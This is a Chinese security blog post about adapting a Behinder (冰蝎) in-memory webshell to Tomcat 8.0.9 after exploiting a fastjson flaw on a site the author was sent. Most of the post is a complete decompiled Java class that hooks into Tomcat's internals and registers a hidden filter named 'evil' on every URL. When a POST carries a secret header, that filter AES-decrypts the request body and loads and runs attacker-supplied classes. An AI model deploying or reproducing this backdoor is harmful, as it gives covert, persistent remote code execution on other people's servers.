关于tomcat8.0.9打冰蝎

admin 2022年5月17日19:35:45评论142 views字数 5119阅读17分3秒阅读模式

事情是这样,朋友发了个站,存在fastjson,本来想着直接打一下内存马交给他收工,发现tomcat8.0.9有点问题。

关于tomcat8.0.9打冰蝎


(1)内存马打不上

简单探测了一下,可以利用JNDIExploit-1.3-SNAPSHOT.jar直接执行命令,开始打内存马。

关于tomcat8.0.9打冰蝎

(2)直接打内存马,发现冰蝎连接不上。本地搭建环境,查看哪儿的问题

关于tomcat8.0.9打冰蝎

发现webappClassLoaderBase爆红了,这不是tomcat的基本类加载器吗,有点离谱,发现tomcat8.0.9没有这个东西。接下来转化思路

1。搜索一个通用的方式获取StandardContext

2。本地调节看看能不能重新获取

(3)这里选择了第二种方式。我先看一下8.0.9的tomcat基本web加载器,直接定义一个serlvet获取classloader看看就行。就不详细说过程了,直接看结果

关于tomcat8.0.9打冰蝎

区别

  1. 基础加载器变为了WebappClassLoader

  2. 获取的filterconfigs字段直接在StandrdContext中

(4)稍微修改一下内存马

关于tomcat8.0.9打冰蝎(5本地测试上线成功

关于tomcat8.0.9打冰蝎

代码如下

// Source code recreated from a .class file by IntelliJ IDEA// (powered by FernFlower decompiler)//
import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.IOException;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.lang.reflect.InvocationTargetException;import java.lang.reflect.Method;import java.util.HashMap;import java.util.Map;import javax.crypto.Cipher;import javax.crypto.spec.SecretKeySpec;import javax.servlet.DispatcherType;import javax.servlet.Filter;import javax.servlet.FilterChain;import javax.servlet.FilterConfig;import javax.servlet.ServletException;import javax.servlet.ServletRequest;import javax.servlet.ServletResponse;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import javax.servlet.http.HttpSession;import org.apache.catalina.Context;import org.apache.catalina.core.ApplicationFilterConfig;import org.apache.catalina.core.StandardContext;import org.apache.catalina.loader.WebappClassLoader;import org.apache.tomcat.util.descriptor.web.FilterDef;import org.apache.tomcat.util.descriptor.web.FilterMap;import sun.misc.BASE64Decoder;
public class be extends AbstractTranslet implements Filter { public be() { }
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { }
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { }
public void init(FilterConfig filterConfig) throws ServletException { }
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException { try { System.out.println("Do Filter ......"); HttpServletRequest request = (HttpServletRequest)servletRequest; HttpServletResponse response = (HttpServletResponse)servletResponse; HttpSession session = request.getSession(); HashMap pageContext = new HashMap(); pageContext.put("request", request); pageContext.put("response", response); pageContext.put("session", session); if (request.getMethod().equals("POST") && request.getHeader("*****").equals("****")) { String k = "dacfb08ed58189ca"; session.putValue("u", k); Cipher c = Cipher.getInstance("AES"); c.init(2, new SecretKeySpec(k.getBytes(), "AES")); Method method = Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE); method.setAccessible(true); byte[] evilclass_byte = c.doFinal((new BASE64Decoder()).decodeBuffer(request.getReader().readLine())); Class evilclass = (Class)method.invoke(this.getClass().getClassLoader(), evilclass_byte, 0, evilclass_byte.length); evilclass.newInstance().equals(pageContext); } } catch (Exception var13) { var13.printStackTrace(); }
filterChain.doFilter(servletRequest, servletResponse); System.out.println("doFilter"); }
public void destroy() { }
public static void main(String[] args) { }
static { try { String name = "evil"; String URLPattern = "/*"; WebappClassLoader webappClassLoaderBase = (WebappClassLoader)Thread.currentThread().getContextClassLoader(); StandardContext standardContext = (StandardContext)webappClassLoaderBase.getResources().getContext(); Class aClass = null;
try { aClass = standardContext.getClass();// aClass = standardContext.getClass().getSuperclass(); aClass.getDeclaredField("filterConfigs"); } catch (Exception var12) { aClass = standardContext.getClass(); aClass.getDeclaredField("filterConfigs"); }
Field Configs = aClass.getDeclaredField("filterConfigs"); Configs.setAccessible(true); Map filterConfigs = (Map)Configs.get(standardContext); be behinderFilter = new be(); FilterDef filterDef = new FilterDef(); filterDef.setFilter(behinderFilter); filterDef.setFilterName("evil"); filterDef.setFilterClass(behinderFilter.getClass().getName()); standardContext.addFilterDef(filterDef); FilterMap filterMap = new FilterMap(); filterMap.addURLPattern("/*"); filterMap.setFilterName("evil"); filterMap.setDispatcher(DispatcherType.REQUEST.name()); standardContext.addFilterMapBefore(filterMap); Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class); constructor.setAccessible(true); ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)constructor.newInstance(standardContext, filterDef); filterConfigs.put("evil", filterConfig); } catch (NoSuchFieldException var13) { var13.printStackTrace(); } catch (InvocationTargetException var14) { var14.printStackTrace(); } catch (IllegalAccessException var15) { var15.printStackTrace(); } catch (NoSuchMethodException var16) { var16.printStackTrace(); } catch (InstantiationException var17) { var17.printStackTrace(); }
}}


原文始发于微信公众号(e0m安全屋):关于tomcat8.0.9打冰蝎

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月17日19:35:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   关于tomcat8.0.9打冰蝎https://cn-sec.com/archives/1014634.html

发表评论

匿名网友 填写信息